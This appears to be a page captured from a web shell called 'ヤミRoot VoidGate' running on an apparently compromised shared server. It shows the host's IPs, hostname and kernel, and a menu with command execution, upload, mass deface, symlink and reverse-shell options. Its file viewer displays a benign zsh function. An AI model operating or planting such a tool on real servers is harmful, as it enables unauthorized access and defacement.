ヤミRoot VoidGate
User / IP
:
216.73.216.49
Host / Server
:
146.88.233.70 / www.dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
usr
/
share
/
zsh
/
5.0.2
/
functions
/
Viewing: insert-unicode-char
# Make hex integers appear as 0x... setopt localoptions cbases integer -g _insert_unicode_ready if [[ $LASTWIDGET = insert-unicode-char && $_insert_unicode_ready -eq 1 ]] then # Second call; we should have a usable prefix. # If we don't, give up. (( ${+NUMERIC} )) || return 1 # Convert it back to hex, padded with zeroes to 8 digits plus the 0x... local -i 16 -Z 10 arg=$NUMERIC # ...and use print to turn this into a Unicode character. LBUFFER+="$(print -n "\U${arg##0x}")" _insert_unicode_ready=0 else # Set the base to 16... zle argument-base 16 # ...wait for user to type hex keys then call this widget again. zle universal-argument _insert_unicode_ready=1 fi
Coded With 💗 by
0x6ick